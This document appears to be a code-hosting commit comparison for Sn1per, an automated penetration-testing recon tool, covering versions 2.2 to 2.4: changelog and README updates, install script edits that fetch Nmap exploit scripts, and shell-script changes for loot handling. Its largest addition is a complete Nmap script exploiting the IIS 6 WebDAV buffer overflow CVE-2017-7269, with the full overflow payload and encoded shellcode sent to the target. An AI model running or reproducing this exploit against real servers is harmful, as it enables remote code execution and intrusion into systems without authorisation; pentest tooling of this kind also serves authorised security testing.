BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v2.2
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
...
compare: BitMaster:v2.4
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

28 Commits
v2.2 ... v2.4

Author SHA1 Message Date
root
10399b6554 Sn1per by 1N3@CrowdShield 2017-04-09 19:30:00 -04:00
root
abeff50be3 Sn1per by 1N3@CrowdShield 2017-04-05 00:00:29 -04:00
root
ff22eb92ff Sn1per by 1N3@CrowdShield 2017-03-16 12:33:11 -04:00
root
fe4587a34c Sn1per by 1N3@CrowdShield 2017-02-18 13:15:38 -05:00
root
e190ab3b78 Sn1per by 1N3@CrowdShield 2017-02-16 10:46:58 -05:00
root
7078f8debc Sn1per by 1N3@CrowdShield 2017-02-16 10:32:40 -05:00
root
86d81fec6d Sn1per by 1N3@CrowdShield 2017-01-27 14:40:42 -05:00
root
8a9d596a56 Merge https://github.com/1N3/Sn1per 2017-01-27 14:39:11 -05:00
root
0008bf8f37 Sn1per by 1N3@CrowdShield 2017-01-27 14:38:34 -05:00
1N3
2ac6c088fd Merge pull request #48 from softsky/master 
Bunch of optimization and less code verbosity
 2017-01-27 14:28:33 -05:00
Arsen A. Gutsal
e47e6a6ce1 minified directory creation 2017-01-24 15:44:52 +02:00
Arsen A. Gutsal
a38da1ec4e fixed syntax errors in sh file 2017-01-18 10:30:51 +02:00
Arsen A. Gutsal
b35eeddeb7 postgresql service is now started conditionally 2017-01-17 20:52:04 +02:00
Arsen A. Gutsal
4012575a77 postgresql is now started again, running BruteX and Findsploit install 2017-01-17 14:05:10 +02:00
Arsen A. Gutsal
e2610c9457 postgresql prevent from start 2017-01-16 20:13:19 +02:00
Arsen A. Gutsal
5761f6584a postresql is now prevented from starting 2017-01-16 20:05:07 +02:00
root
7d37cc8413 Merge https://github.com/1N3/Sn1per 2017-01-14 13:34:28 -05:00
root
8f5c31a38a Sn1per by 1N3@CrowdShield 2017-01-14 13:33:34 -05:00
1N3
016af76d8f Delete sniper~ 2017-01-02 19:03:47 -07:00
1N3
448bb43284 Delete CHANGELOG.md~ 2017-01-02 19:03:33 -07:00
root
cc320a910e Sn1per by 1N3@CrowdShield 2017-01-02 21:02:24 -05:00
root
bd6ae00b63 Sn1per by 1N3@CrowdShield 2017-01-02 13:45:27 -05:00
Arsen A. Gutsal
2903f3a468 sniper conflicted 2016-12-29 18:25:42 +02:00
Arsen A. Gutsal
bbc3894ba0 Master merged 2016-12-29 18:24:32 +02:00
root
68c8909270 Sn1per by 1N3@CrowdShield 2016-12-26 20:26:36 -05:00
root
3e7024528b Sn1per by 1N3@CrowdShield 2016-12-04 12:19:34 -05:00
Arsen A. Gutsal
c025c93629 merged to th3gundy 2016-10-25 15:11:29 +03:00
Yunus YILDIRIM
11e203fe91 update sub-domain hijack list 2016-07-12 12:53:48 +03:00
5 changed files with 384 additions and 98 deletions
Expand all files Collapse all files

25
CHANGELOG.md
View File

@@ -1,4 +1,23 @@
## CHANGELOG:
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
* v2.2d - Added MongoDB checks
* v2.2d - Improved NMap scanning options
* v2.2c - Added CouchDB checks
* v2.2c - Updated Sub-domain takeover list
* v2.2b - Added fullportonly mode to do exclusive full port scans
* v2.2b - Fixed minor issue with Metasploit Pro not starting
* v2.2b - Fixed minor issue with sniper loot command
* v2.2a - Fixed minor issue with loot function
* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
* v2.2 - Added Sn1per workspaces to loot directory
* v2.1d - Added crt.sh sub-domain check
@@ -124,4 +143,8 @@
* v1.4 - Removed debug output from goohak from displaying on console
## FUTURE:
* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
* Add auto logging and reporting to all scans
* Add HTML reporting for scans
* Add automated Wireless attacks to Sn1per
* Add automated MITM attacks to Sn1per
* Add web mode port option for customized web scans

2
README.md
View File

@@ -47,6 +47,7 @@ sniper <target> <report>
sniper <target> stealth <report>
sniper <CIDR> discover
sniper <target> port <portnum>
sniper <target> fullportonly <portnum>
sniper <target> web <report>
sniper <target> nobrute <report>
sniper <targets.txt> airstrike <report>
@@ -59,6 +60,7 @@ sniper loot
* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.

181
bin/iis-buffer-overflow.nse Normal file
View File

@@ -0,0 +1,181 @@
local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"
-- NSE Buffer Overflow vulnerability in IIS
---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | iis-buffer-overflow:
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- | State: LIKELY_VULNERABLE
-- | Risk factor: High CVSS: 10.0
-- | Description:
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- | service in Internet Information Services (IIS) 6.0
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- | arbitrary code via a long header beginning with "If: <http://" in a
-- | PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- | Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- | References:
-- | https://github.com/edwardz246003/IIS_exploit,
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--
author = {
"Zhiniang Peng", -- Original author
"Chen Wu", -- Original author
"Rewanth Cool" -- NSE script author
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}
portrule = shortport.portnumber(80, "tcp")
action = function(host, port)
local socket, response, try, catch, payload, shellcode, vulnerable_name
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
]],
IDS = {
CVE = 'CVE-2017-7269'
},
scores = {
CVSS = '10.0'
},
references = {
'https://github.com/edwardz246003/IIS_exploit',
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
},
dates = {
disclosure = {year = '2017', month = '03', day = '26'},
}
}
-- If domain name doesn't exist this line of code takes ip into consideration
vulnerable_name = host.targetname or host.ip
socket = nmap.new_socket()
catch = function()
socket:close()
end
try = nmap.new_try(catch)
try(socket:connect(host, port))
-- Crafting the payload by parts
-- Crafting the request with HTTP PROPFIND method
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
payload = payload .. '\xb3\xe3\x95\xb7'
-- Main payload (Do not edit this part)
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
payload = payload .. '>'
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
-- Main payload (Do not edit this part)
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
-- Shellcode
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
payload = payload .. shellcode
payload = payload .. '>\r\n\r\n'
-- Exploiting the vulnerability
try(socket:send(payload))
-- We receive a 200 response if the payload succeeds.
response = try(socket:receive_bytes(80960))
socket:close()
-- Checking for 200 response in the response
local regex = "HTTP/1.1 (%d+)"
local status = string.match(response, regex)
if status == '200' then
-- Buffer overflow is successfully executed on the server.
vuln.state = vulns.STATE.EXPLOIT,
vuln.exploit_results = response
elseif status == '400' then
-- Bad request error is occured because webdav is not installed.
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 400: Install webdav and try again."
elseif status == '502' then
-- Likely to have an error in the Server Name
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
elseif status ~= nil then
vuln.exploit_results = response
end
return vuln_report:make_output(vuln)
end

7
install.sh
View File

@@ -47,6 +47,7 @@ echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -63,9 +64,11 @@ git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
cp $PWD/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/BruteX/
bash install.sh
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh
cd $INSTALL_DIR
mkdir $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null

267
sniper
View File

@@ -1,10 +1,10 @@
#!/bin/bash
# + -- --=[Sn1per v2.2 by 1N3
# + -- --=[Sn1per by 1N3
# + -- --=[http://crowdshield.com
#
# Sn1per - Automated Pentest Recon Tool
#
# FEATURED:
# FEATURES:
# - Automatically collect recon info (ie. whois, ping, DNS, etc.)
# - Automatically collects Google hacking recon info
# - Automatically run port scans
@@ -25,15 +25,18 @@
# sniper <CIDR> discover <report>
# sniper <target> stealth <report>
# sniper <target> port <portnum>
# sniper <target fullportonly <portnum>
# sniper <target> web <report>
# sniper <targets.txt> airstrike <report>
# sniper <targets.txt> nuke <report>
# sniper loot
#
VER="2.4"
TARGET="$1"
MODE="$2"
OPT1="$3"
DISABLE_POSTGRESQL="true" # disabling postgresql startup, assuming it's running already
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="/usr/share/sniper/loot"
PLUGINS_DIR="/usr/share/sniper/plugins"
@@ -45,6 +48,7 @@ USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
@@ -61,6 +65,10 @@ AUTOBRUTE="1"
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
# DEFAULT IS "1" (ENABLED)
GOOHAK="1"
cd $INSTALL_DIR
function loot {
@@ -71,58 +79,51 @@ function loot {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[Current workspaces..."
echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
cd $LOOT_DIR
ls -lh $LOOT_DIR/workspace/
echo -e "$OKORANGE + -- --=[Enter a name for the workspace:"
echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
read WORKSPACE
if [ -z $WORKSPACE ]; then
WORKSPACE="default"
fi
mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
echo -e "$OKORANGE + -- --=[Generating reports..."
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" > $LOOT_DIR/reports/$a
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
mv $a $LOOT_DIR/output/
done
echo -e "$OKORANGE + -- --=[Removing blank web screenshots..."
echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
echo -e "$OKORANGE + -- --=[Starting Metasploit service..."
echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
/etc/init.d/metasploit start 2> /dev/null
echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit..."
if [ -z $DISABLE_POSTGRESQL ]; then /etc/init.d/postgresql start 2> /dev/null; fi
echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE..."
cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/screenshots/ 2> /dev/null
cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null
cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/domains/ 2> /dev/null
cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/output/ 2> /dev/null
cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/reports/ 2> /dev/null
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/imports/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/notes/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/web/ 2> /dev/null
rm -Rf $LOOT_DIR/screenshots/ 2> /dev/null
rm -Rf $LOOT_DIR/nmap/ 2> /dev/null
rm -Rf $LOOT_DIR/domains/ 2> /dev/null
rm -Rf $LOOT_DIR/output/ 2> /dev/null
rm -Rf $LOOT_DIR/reports/ 2> /dev/null
rm -Rf $LOOT_DIR/imports/ 2> /dev/null
rm -Rf $LOOT_DIR/notes/ 2> /dev/null
rm -Rf $LOOT_DIR/web/ 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
mkdir $LOOT_DIR/nmap -p 2> /dev/null
mkdir $LOOT_DIR/domains -p 2> /dev/null
mkdir $LOOT_DIR/output -p 2> /dev/null
mkdir $LOOT_DIR/reports -p 2> /dev/null
mkdir $LOOT_DIR/imports -p 2> /dev/null
mkdir $LOOT_DIR/notes -p 2> /dev/null
mkdir $LOOT_DIR/web -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory..."
echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET"
cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
iceweasel 2> /dev/null &
sleep 2
iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI..."
sleep 2
echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
iceweasel http://localhost:3001/login 2> /dev/null &
echo -e "$OKORANGE + -- --=[Launching Zenmap..."
echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
echo -e "$OKORANGE + -- --=[Done!"
